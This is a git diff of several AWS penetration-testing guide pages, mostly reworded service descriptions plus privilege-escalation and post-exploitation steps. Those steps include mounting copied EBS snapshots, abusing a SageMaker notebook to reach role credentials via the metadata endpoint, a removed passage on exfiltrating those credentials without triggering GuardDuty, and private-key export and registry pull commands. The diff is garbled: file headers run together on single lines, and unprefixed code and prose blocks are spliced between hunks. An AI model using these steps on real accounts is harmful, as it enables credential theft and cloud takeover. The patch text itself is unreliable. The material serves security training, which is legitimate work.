index c2f894138a..f030e2c169 100644
--- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
@@ -59,27 +59,40 @@ aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snaps
 **Mount it in an EC2 VM under your control** (it has to be in the same region as the copy of the backup):
-**step 1:** Head over to EC2 –> Volumes and create a new volume of your preferred size and type.
+Step 1: Head over to EC2 –> Volumes and create a new volume of your preferred size and type. Make sure the EBS volume and the target instance are in the same availability zone.
-**Step 2:** Select the created volume, right click and select the “attach volume” option.
+Step 2: Right-click on the created volume and select the “attach volume” option.
-**Step 3:** Select the instance from the instance text box as shown below.
-![](<../../../../.gitbook/assets/image (6) (1) (1) (1).png>)
+Step 3: Select the instance in the instance text box and attach the volume.
-**Step 4**_:_ Now, login to your ec2 instance and list the available disks using the following command.
-```
-lsblk
-```
+Step 4: Log in to the EC2 instance and list the available disks using the command `lsblk`.
-The above command will list the disk you attached to your instance.
+Step 5: Check if the volume has any data using the command `sudo file -s /dev/xvdf`. If the output shows "/dev/xvdf: data", the volume is empty (it contains no filesystem).
+
+Step 6: Only if the volume is empty, format it with `sudo mkfs -t ext4 /dev/xvdf` or, alternatively, `sudo mkfs -t xfs /dev/xvdf` (use either ext4 or xfs). Skip this step for a volume created from a snapshot, as formatting it would destroy the data you want to inspect.
+
+Step 7: Create a directory of your choice to mount the new volume, for example "newvolume": `sudo mkdir /newvolume`.
-**Step 5:**
-![](<../../../../.gitbook/assets/image (59).png>)
+Step 8: Mount the volume on the "newvolume" directory using the command `sudo mount /dev/xvdf /newvolume/`.
-You can do this with Pacu using the module ebs\_\_explore\_snapshots
+Step 9: Change into the `/newvolume` directory and check the disk space to validate the mount with `df -h .`; the output should show the free space of the newly mounted volume.
+
+You can do this with Pacu using the module `ebs__explore_snapshots`.
 ### Checking a snapshot in AWS (using cli)
@@ -117,6 +130,10 @@ Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the ha
 You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+
## References
* [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/)

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
index 496565fe6b..01fb82dd95 100644
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -18,42 +18,33 @@ Other ways to support HackTricks:
 ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
-The first step in this attack process is to **identify a role that trusts SageMaker to assume it** (sagemaker.amazonaws.com). Once that’s done, we can run the following command to create a new notebook with that role attached:
+Start by creating a notebook with the IAM role you want to access attached to it:
```
aws sagemaker create-notebook-instance --notebook-instance-name example \
    --instance-type ml.t2.medium \
-    --role-arn arn:aws:iam::ACCOUNT-ID:role/service-role/AmazonSageMaker-ExecutionRole-xxxxxx
+    --role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
```
-If successful, you will receive the **ARN of the new notebook instance** in the response from AWS. That will take **a few minutes** to spin up, but once it has done so, we can run the following command to get a pre-signed URL to get **access to the notebook instance through our web browser**. There are potentially other ways to gain access, but this is a single permission and single API call, so it seemed simple.
+The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready:
```bash
aws sagemaker create-presigned-notebook-instance-url \
    --notebook-instance-name <notebook-instance-name>
```
-If this instance was fully spun up, this API call will return a **signed URL that we can visit** in our browser to access the instance. Once at the Jupyter page in my browser, I’ll click "Open JupyterLab" in the top right, which can be seen in the following screenshot.
+Navigate to the URL with the browser and click on `Open JupyterLab` in the top right, then scroll down to the “Launcher” tab and, under the “Other” section, click the “Terminal” button.
-![](<../../../.gitbook/assets/image (15) (1) (1).png>)
-From the next page, scroll all the way down in the “Launcher” tab. Under the “Other” section, click the “Terminal” button, which can be seen here.
-![](<../../../.gitbook/assets/image (27).png>)
-From the terminal we have a few options, one of which would be to just **use the AWS CLI**. The other option would be to **contact the EC2 metadata** service for the IAM role’s credentials directly and exfiltrate them.
-GuardDuty might come to mind when reading “exfiltrate them” above, however, we don’t actually need to worry about GuardDuty here. The related GuardDuty finding is [“UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration”](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_unauthorized.html#unauthorized11), which will alert if a role’s credentials are stolen from an EC2 instance and used elsewhere. Luckily for us, this EC2 instance doesn’t actually live in our account, but instead it is a **managed EC2 instance hosted in an AWS-owned account**. That means that **we can exfiltrate these credentials and not worry about triggering** our target’s GuardDuty detectors.
+Now it's possible to access the metadata credentials of the IAM role.
 **Potential Impact:** Privesc to the sagemaker service role specified.
 ### `sagemaker:CreatePresignedNotebookInstanceUrl`
-Similar to the previous example, if Jupyter **notebooks are already running** on it and you can list them with sagemaker:ListNotebookInstances (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**.
+If there are Jupyter **notebooks already running** on the instance and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way), you can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**.
```bash
aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <notebook-instance-name>
```
 **Potential Impact:** Privesc to the sagemaker service role attached.
@@ -129,6 +120,9 @@
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
```
 An attacker with those permissions will (potentially) be able to create a **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
 _I haven't exploited it due to lack of time, but it looks similar to the previous exploits; feel free to send a PR with the exploitation details._
## References
* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md index bf29b55ae8..75fbcac1e4 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md +++ b/pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md @@ -16,17 +16,17 @@ Other ways to support HackTricks: ## Basic Information -**AWS Certificate Manager (ACM)** is a service designed to simplify the provisioning, management, and deployment of SSL/TLS certificates for AWS services and internal resources. It **eliminates the manual steps involved** in purchasing, uploading, and renewing these certificates. With ACM, users can easily request and deploy certificates on various AWS resources like Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway. +**AWS Certificate Manager (ACM)** is provided as a service aimed at streamlining the **provisioning, management, and deployment of SSL/TLS certificates** for AWS services and internal resources. The necessity for manual processes, such as purchasing, uploading, and certificate renewals, is **eliminated** by ACM. This allows users to efficiently request and implement certificates on various AWS resources including **Elastic Load Balancers, Amazon CloudFront distributions, and APIs on API Gateway**. -ACM also takes care of **automatic certificate renewals**. Additionally, it allows for the creation and centralized management of **private certificates for internal use**. SSL/TLS certificates provided through ACM for use exclusively with integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are free, but users pay for any AWS resources used to run applications and a monthly fee for the operation of each **private Certificate Authority (CA)** and for private certificates used outside of ACM-integrated services. +A key feature of ACM is the **automatic renewal of certificates**, significantly reducing the management overhead. Furthermore, ACM supports the creation and centralized management of **private certificates for internal use**. Although SSL/TLS certificates for integrated AWS services like Elastic Load Balancing, Amazon CloudFront, and Amazon API Gateway are provided at no extra cost through ACM, users are responsible for the costs associated with the AWS resources utilized by their applications and a monthly fee for each **private Certificate Authority (CA)** and private certificates used outside integrated ACM services. -**AWS Private Certificate Authority** is a **managed private CA** service that **extends ACM certificate management to private certificates**. With private certificates you can authenticate resources inside an organization. +**AWS Private Certificate Authority** is offered as a **managed private CA service**, enhancing ACM's capabilities by extending certificate management to include private certificates. These private certificates are instrumental in authenticating resources within an organization. 
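One detail worth knowing before enumerating: certificates issued by a private CA can be exported together with their private key (publicly issued ACM certificates cannot). A boto3 sketch with a hypothetical ARN and passphrase:

```python
import boto3

acm = boto3.client("acm")
cert_arn = "arn:aws:acm:us-east-1:123456789012:certificate/aaaabbbb-1111-2222"  # hypothetical

# Only works for certificates issued by AWS Private CA; the key is returned passphrase-encrypted
export = acm.export_certificate(CertificateArn=cert_arn, Passphrase=b"P4ssphrase!")
print(export["Certificate"])
print(export["PrivateKey"])
```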
## Enumeration
### ACM
-```
+```bash
# List certificates
aws acm list-certificates
@@ -42,7 +42,7 @@ aws acm get-account-configuration
### PCA
-```
+```bash
# List CAs
aws acm-pca list-certificate-authorities
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
index 25b81a863e..144a0b3bac 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 ## CloudFormation
-AWS CloudFormation is a service that helps you **model and set up your AWS resources** so that you can spend **less time managing those resources** and more time focusing on your applications that run in AWS. You create a **template that describes all the AWS resources** that you want, and CloudFormation takes care of provisioning and configuring those resources for you.
+AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**: a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure.
 ### Enumeration
@@ -78,6 +78,9 @@ In the following page you can check how to **abuse codestar permissions to escal
[aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/)
{% endcontent-ref %}
## References
* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/)

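Because templates describe entire deployments, stack parameters and outputs are a classic place to find leaked credentials. A boto3 enumeration sketch:

```python
import boto3

cf = boto3.client("cloudformation")

# Walk every stack and print its parameters/outputs, a common spot for leaked secrets
for page in cf.get_paginator("describe_stacks").paginate():
    for stack in page["Stacks"]:
        print(stack["StackName"])
        for p in stack.get("Parameters", []):
            print("  param :", p["ParameterKey"], "=", p.get("ParameterValue"))
        for o in stack.get("Outputs", []):
            print("  output:", o["OutputKey"], "=", o.get("OutputValue"))
```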
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
index be87484b49..6122ca6518 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
@@ -16,7 +16,14 @@ Other ways to support HackTricks:
 ## CodeBuild
-AWS **CodeBuild** is a fully **managed continuous integration service that compiles source code, runs tests, and produces software packages that are ready to deploy**. With CodeBuild, you don’t need to provision, manage, and scale your own build servers.
+AWS **CodeBuild** is a **fully managed continuous integration service**. It automates the process of compiling source code, conducting tests, and packaging the software for deployment. The main advantage of using CodeBuild is that it eliminates the need to provision, manage, and scale build servers, as these tasks are handled by the service itself. The key features of AWS CodeBuild include:
+
+1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
+2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
+3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
+
+AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
 ### Enumeration
@@ -61,6 +68,9 @@ In the following page, you can check how to **abuse codebuild permissions to esc
[aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
{% endcontent-ref %}
## References
* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)

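Since builds frequently receive secrets through environment variables, project definitions are a prime enumeration target. A boto3 sketch:

```python
import boto3

cb = boto3.client("codebuild")

# PLAINTEXT variables carry their value inline; PARAMETER_STORE and SECRETS_MANAGER
# entries are only references to where the secret is stored
names = cb.list_projects()["projects"]
if names:
    for project in cb.batch_get_projects(names=names)["projects"]:
        print(project["name"])
        for var in project["environment"].get("environmentVariables", []):
            print(" ", var["name"], f"({var['type']})", var.get("value"))
```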
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md index 976c944e13..fb109af5d8 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md +++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md @@ -16,9 +16,13 @@ Other ways to support HackTricks: ## Cognito -Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple. +Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. -The two main components of Amazon Cognito are **user pools** and **identity pools**. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to **grant your users access to other AWS services**. +Central to Amazon Cognito are two primary components: + +1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. + +2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. ### **User pools** diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md index eb2fd34d42..93a128c54e 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md +++ b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md @@ -16,13 +16,36 @@ Other ways to support HackTricks: ## Basic Information -With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools: +Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. 
The supported identity providers include:
-* Amazon Cognito user pools
-* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple
-* OpenID Connect (OIDC) providers
-* SAML identity providers
-* Developer authenticated identities
+- Amazon Cognito user pools
+- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple
+- Providers compliant with OpenID Connect (OIDC)
+- SAML (Security Assertion Markup Language) identity providers
+- Developer authenticated identities
+
+```python
+# Sample code to demonstrate how to configure the IAM roles an identity pool hands out
+import boto3
+
+# Initialize the Amazon Cognito Identity client
+client = boto3.client('cognito-identity')
+
+# Assume you have already created an identity pool and obtained the IdentityPoolId
+identity_pool_id = 'your-identity-pool-id'
+
+# Set the IAM roles returned for authenticated and unauthenticated identities
+response = client.set_identity_pool_roles(
+    IdentityPoolId=identity_pool_id,
+    Roles={
+        'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole',
+        'unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',
+    }
+)
+
+# Print the response from AWS
+print(response)
+```
 ### Cognito Sync
diff --git a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md
index 1511773399..d1b1c3b88b 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md
+++ b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-documentdb-enum.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 ## DocumentDB
-Amazon DocumentDB (with MongoDB compatibility) is a fast, reliable, and **fully managed database service**. Amazon DocumentDB makes it easy to set up, operate, and **scale MongoDB-compatible databases in the cloud**. With Amazon DocumentDB, you can run the same application code and use the same drivers and tools that you use with MongoDB.
+Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB.
 ### Enumeration
@@ -45,6 +45,9 @@ As DocumentDB is a MongoDB compatible database, you can imagine it's also vulner
[aws-documentdb-enum.md](../../aws-unauthenticated-enum-access/aws-documentdb-enum.md)
{% endcontent-ref %}
## References
* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/)

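Following on from the MongoDB compatibility just mentioned, a recovered endpoint and credential pair can be tested with any MongoDB driver. A pymongo sketch (all URI values are placeholders; DocumentDB normally enforces TLS with the AWS CA bundle):

```python
import pymongo

# Hypothetical cluster endpoint and credentials recovered during enumeration
uri = (
    "mongodb://admin:Password1@sample-cluster.node.us-east-1.docdb.amazonaws.com:27017/"
    "?tls=true&tlsCAFile=global-bundle.pem&replicaSet=rs0&retryWrites=false"
)

client = pymongo.MongoClient(uri)
print(client.list_database_names())  # same driver calls as against a plain MongoDB
```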
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md index 5895e56cfa..dbb835af0a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-dynamodb-enum.md @@ -18,9 +18,10 @@ Other ways to support HackTricks: ### Basic Information -Amazon DynamoDB is a **fully managed, serverless, key-value NoSQL database** designed to run high-performance applications at any scale. DynamoDB offers built-in security, continuous backups, automated multi-Region replication, in-memory caching, and data export tools. +Amazon DynamoDB is recognized as a **fully managed, serverless, key-value NoSQL database**, tailored for powering high-performance applications regardless of their size. The service ensures robust features including inherent security measures, uninterrupted backups, automated replication across multiple regions, integrated in-memory caching, and convenient data export utilities. + +In the context of DynamoDB, instead of establishing a traditional database, **tables are created**. Each table mandates the specification of a **partition key** as an integral component of the **table's primary key**. This partition key, essentially a **hash value**, plays a critical role in both the retrieval of items and the distribution of data across various hosts. This distribution is pivotal for maintaining both scalability and availability of the database. Additionally, there's an option to incorporate a **sort key** to further refine data organization. -In DynamoDB you don't create a DB but you **create a table**. Each table needs to have configured a **partition ke**y is part of the **table's primary key**. It is a **hash value** that is used to retrieve items from your table and allocate data across hosts for scalability and availability. It's also possible to configure a **sort key**. ### Encryption diff --git a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md index 9f506fed3f..399d931bad 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-databases/aws-relational-database-rds-enum.md @@ -16,11 +16,20 @@ Other ways to support HackTricks: ## Basic Information -**Relational Database Service (RDS)** is a managed database service that simplifies the process of setting up, operating, and scaling a **relational database in the cloud**. AWS RDS provides cost-efficient and resizable capacity, and it automates time-consuming administration tasks, such as hardware provisioning, database setup, patching, and backups. +The **Relational Database Service (RDS)** offered by AWS is designed to streamline the deployment, operation, and scaling of a **relational database in the cloud**. This service offers the advantages of cost efficiency and scalability while automating labor-intensive tasks like hardware provisioning, database configuration, patching, and backups. -AWS RDS supports **several popular relational database engines**: MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server & Amazon Aurora compatible with MySQL or with PostgreSQL. 
+AWS RDS supports various widely-used relational database engines including MySQL, PostgreSQL, MariaDB, Oracle Database, Microsoft SQL Server, and Amazon Aurora, with compatibility for both MySQL and PostgreSQL. + +Key features of RDS include: + +- **Management of database instances** is simplified. +- Creation of **read replicas** to enhance read performance. +- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. +- **Integration** with other AWS services, such as: + - AWS Identity and Access Management (**IAM**) for robust access control. + - AWS **CloudWatch** for comprehensive monitoring and metrics. + - AWS Key Management Service (**KMS**) for ensuring encryption at rest. -With RDS, you can easily manage database instances, create read **replicas** to increase read **performance**, and set up **multi-Availability Zone (AZ)** deployments for high availability and failover support. Additionally, RDS **integrates** with other AWS services, such as AWS Identity and Access Management (**IAM**) for **access control**, AWS **CloudWatch** for monitoring and metrics, and AWS Key Management Service (**KMS**) for encryption at rest. ## Credentials @@ -55,13 +64,26 @@ It's not possible to add this level of encryption after your database has been c However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted. -#### TDE Encryption +#### Transparent Data Encryption (TDE) + +Alongside the encryption capabilities inherent to RDS at the application level, RDS also supports **additional platform-level encryption mechanisms** to safeguard data at rest. This includes **Transparent Data Encryption (TDE)** for Oracle and SQL Server. However, it's crucial to note that while TDE enhances security by encrypting data at rest, it may also **affect database performance**. This performance impact is especially noticeable when used in conjunction with MySQL cryptographic functions or Microsoft Transact-SQL cryptographic functions. + +To utilize TDE, certain preliminary steps are required: + +1. **Option Group Association**: + - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. + - However, it's important to note that option groups are only available for specific database engines and versions. -In addition to encryption offered by RDS itself at the application level, there are **additional platform level encryption mechanisms** that could be used for protecting data at rest including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, and this could be used in conjunction with the method order discussed but it would **impact the performance** of the database MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions. +2. **Inclusion of TDE in Option Group**: + - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. + - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. -If you want to use the TDE method, then you must first ensure that the database is associated to an option group. 
Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions. +3. **TDE Encryption Modes**: + - TDE offers two distinct encryption modes: + - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. + - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. -Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database. +Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. ### Enumeration diff --git a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md index c02f849857..4bb9e5461d 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +++ b/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -16,7 +16,17 @@ Other ways to support HackTricks: ## DataPipeline -With AWS Data Pipeline, you can regularly a**ccess your data where it’s stored**, **transform** and **process it at scale**, and efficiently transfer the results to AWS services such as Amazon S3, Amazon RDS, Amazon DynamoDB, and Amazon EMR. +AWS Data Pipeline is designed to facilitate the **access, transformation, and efficient transfer** of data at scale. It allows the following operations to be performed: + +1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. +2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. +3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: + - Amazon S3 + - Amazon RDS + - Amazon DynamoDB + - Amazon EMR + +In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. ### Enumeration @@ -98,6 +108,9 @@ ssh-keygen -f .ssh/id_rsa -l -E md5 git clone ssh://@git-codecommit..amazonaws.com/v1/repos/ ``` +# References +* [https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html](https://docs.aws.amazon.com/whitepapers/latest/aws-overview/analytics.html) +
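As a usage sketch for the CodeCommit SSH access shown above: the SSH key ID that IAM returns after uploading your public key acts as the username. The key ID, key path and repository below are hypothetical placeholders:

```bash
# Map every CodeCommit endpoint to the uploaded key (key ID comes from IAM)
cat >> ~/.ssh/config <<'EOF'
Host git-codecommit.*.amazonaws.com
  User APKAEIBAERJR2EXAMPLE
  IdentityFile ~/.ssh/codecommit_rsa
EOF
chmod 600 ~/.ssh/config

# Clone using the configured identity
git clone ssh://git-codecommit.us-east-1.amazonaws.com/v1/repos/my-repo
```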
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index 6b708590d4..2f52d7e9f1 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -24,7 +24,7 @@ Learn what a VPC is and about its components in: ## EC2 -You can use Amazon EC2 to launch **virtual servers**, configure **security** and **networking**, and manage **storage**. Amazon EC2 enables you to scale up or down to handle changes in requirements or spikes in popularity, reducing your need to forecast traffic. +Amazon EC2 is utilized for initiating **virtual servers**. It allows for the configuration of **security** and **networking** and the management of **storage**. The flexibility of Amazon EC2 is evident in its ability to scale resources both upwards and downwards, effectively adapting to varying requirement changes or surges in popularity. This feature diminishes the necessity for precise traffic predictions. Interesting things to enumerate in EC2: @@ -331,6 +331,9 @@ If a **VPN connection was stablished** you should search for **`.opvn`** config [aws-vpn-post-exploitation.md](../../aws-post-exploitation/aws-vpn-post-exploitation.md) {% endcontent-ref %} +# References +* [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) +
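A couple of illustrative enumeration commands for the EC2 attack surface described above (region, instance ID and filters are arbitrary examples):

```bash
# List instances with public IP, attached instance profile and state
aws ec2 describe-instances --region us-east-1 \
  --query 'Reservations[].Instances[].[InstanceId,PublicIpAddress,IamInstanceProfile.Arn,State.Name]' \
  --output table

# User data frequently leaks bootstrap credentials
aws ec2 describe-instance-attribute --instance-id i-0123456789abcdef0 \
  --attribute userData --query 'UserData.Value' --output text | base64 -d
```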
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md index c1e8ed7685..46c043ed39 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -18,7 +18,7 @@ Other ways to support HackTricks:

### Basic Information

-Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. Customers can use the familiar Docker CLI, or their preferred client, to push, pull, and manage images.
+Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.

ECR is composed of 2 types of objects: **Registries** and **Repositories**.

@@ -108,6 +108,9 @@ In the following page you can check how to **abuse ECR permissions to escalate p

[aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md)
{% endcontent-ref %}

+# References
+* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html)
+
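For example, the standard Docker workflow against a registry looks like this (the account ID, region and repository are placeholders):

```bash
# Authenticate the Docker client against the target registry
aws ecr get-login-password --region us-east-1 | \
  docker login --username AWS --password-stdin 123456789012.dkr.ecr.us-east-1.amazonaws.com

# Pull an image to inspect it locally (images often embed secrets)
docker pull 123456789012.dkr.ecr.us-east-1.amazonaws.com/my-repo:latest
```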
